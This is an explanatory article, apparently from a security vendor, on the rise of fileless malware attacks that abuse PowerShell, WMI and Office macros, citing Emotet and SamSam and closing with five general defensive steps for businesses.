A new kind of malware is giving hackers an edge in the war on cybercrime
Fileless malware attacks are on the rise – soaring a whopping 94 percent in the first half of 2018 – and cybersecurity experts are warning that this hard-to-detect infection method is trailblazing a whole new category of cyber-attacks that represents a stealthier future for malware.
Typically, malware relies on files that install malicious software onto a machine’s hard disk. Fileless attacks – also known as zero footprint, macro, or non-malware attacks – give hackers an edge against most security tools and enterprise defenders. Here’s why: This next-generation attack leverages applications already installed on an endpoint that are accepted as safe, eliminating the need to install software or files cybersecurity systems can detect.
Instead, malware instructions are slipped inside a target’s memory and malicious code is injected into default Windows tools that carry out system tasks for multiple endpoints on a network, making it easy for the malware to move laterally to other machines. Common fileless attacks target browser vulnerabilities that can make the browser run malicious code, take advantage of Microsoft Word macros, or use Microsoft’s PowerShell or Windows Management Instrumentation (WMI) utilities.
In fact, PowerShell is particularly abused by fileless attackers because it’s installed on every Windows machine, it’s capable of carrying out commands, it has unrestricted access to a machine’s operating system, and it’s part of the daily workflow of many IT professionals. That last criteria makes it nearly impossible to ban employees from using it and renders it less likely that heavy amounts of use would raise red flags.
Using PowerShell or other reputable tools in a fileless malware attack makes it easy for attackers to quickly move from compromising a single machine to compromising an entire enterprise. With no detectable signature and no reason for security programs to question commands from legitimate programs, these threats can fool many cybersecurity analysts, antimalware and antivirus software, and whitelists, which only allow approved applications to be installed.
The Ponemon Institute’s 2018 State of Endpoint Security Risk report asserts that fileless malware attacks are 10 times more likely to succeed than file-based attacks. It also predicts that nearly 40 percent of attacks targeting companies in 2019 will be fileless.
The Equifax data breach, which exposed the personal information of nearly 150 million people in 2017, was a fileless attack.
Large-scale distribution of exploit kits makes an old threat new
Although the number of fileless attacks has recently exploded, it is not a new threat. In-memory exploits played a prominent role in 2003’s SQL Slammer worm, for instance, which knocked out Internet and cell phone coverage for 27 million people and took nearly all of Bank of America’s 13,000 ATM machines in the U.S. offline.
But the creation and large-scale distribution of malicious toolkits (known as exploit kits) that make these attacks simple to launch has dramatically increased their frequency. As a result, this sophisticated attack method once limited to nation-states and other advanced adversaries is becoming common in commercial attacks as well.
In July, US-CERT issued an alert about Emotet, a fileless banking trojan/downloading/botnet it called one of the “most costly and destructive malware.” Along with Emotet’s frequent accomplice TrickBot, the malware, which is most active in the U.S., vertically infects an entire network – stealing information and dropping additional malware at breakneck speeds, while mutating every dropper to avoid detection. It borrows anti-forensic techniques previously wielded in complex nation-state attacks, infusing its malware with behaviors and tactics that can resist many attempts at cleanup.
Infosecurity magazine reports that Emotet was detected and removed from networks more than 1.5 million times between January and September of 2018.
SamSam ransomware is another sophisticated fileless attack wreaking havoc primarily in the American business landscape. Sophos reports that this ransomware has earned nearly $6 million for its creator to date and attacks show no sign of slowing down. Unlike the majority of ransomware which rely on untargeted spam campaigns to infiltrate companies, SamSam is particularly frightening because it is used in targeted attacks where skilled hackers break into a victim’s network, scope it, and then run the malware manually in a method custom-designed to inflict maximum damage.
A SamSam attack that took down the City of Atlanta’s computer network in March is expected to cost taxpayers $17 million, including the cost of remediations like new equipment, software upgrades, and security services.
Protecting your business from fileless attacks
Traditional security systems are not built to spot and remove malware that resides in a machine’s memory instead of on its disk. Most rely on signature-based detection methods, only look for traditional data and on-disk malware, and lack the ability to monitor process memory.
Disabling many Microsoft tools to prevent fileless attacks isn’t really an option. PowerShell, for instance, is essential to using most Microsoft products, and restricting its usage would only make the jobs of IT professionals more complicated.
But while fileless attacks are exceptionally hard to thwart, organizations don’t need to feel helpless against them. Here are five steps you can take to protect your business:
- Make sure that the operating system software, applications, and firmware on computers that connect to your network are updated and known security vulnerabilities are patched. Unpatched software is like putting out a welcome mat for hackers.
- Educate employees about phishing emails, and why it’s risky to click links in emails or open files attached to them – even if they appear to come from known sources. The majority of malware – including fileless attacks – is delivered through phishing attacks that often spoof known people or organizations.
- Hackers can crack weak passwords in minutes with password-cracking tools. Be sure to follow best practices for creating strong passwords for system and service accounts.
- Disable any system administration tools that aren’t used so cybercriminals can’t hijack them to launch fileless attacks. It’s also wise to disable macros in Microsoft Office apps like Word and Excel, which cybercriminals can use to gain access.
- Block any activities that seem suspicious, such as outbound processes trying to connect to untrusted servers or websites.
Winning the war against this new evolution of cybercrime rests in the ability to detect threats because they act like threats – and not necessarily because they look like one.
To successfully battle this new category of malware, companies need next-generation security software that takes a multi-layered approach to spotting and remediating threats, including behavioral detection capabilities that employ machine learning, the newest endpoint protections, and the ability to monitor entry points and network traffic for suspicious activity.
Hackers know that fileless attacks afford them the greatest chance of achieving their malicious goals. A cutting-edge cybersecurity provider can help you implement a dynamic solution that can learn from the threats it encounters – helps you do business confidently in the threat landscape of tomorrow.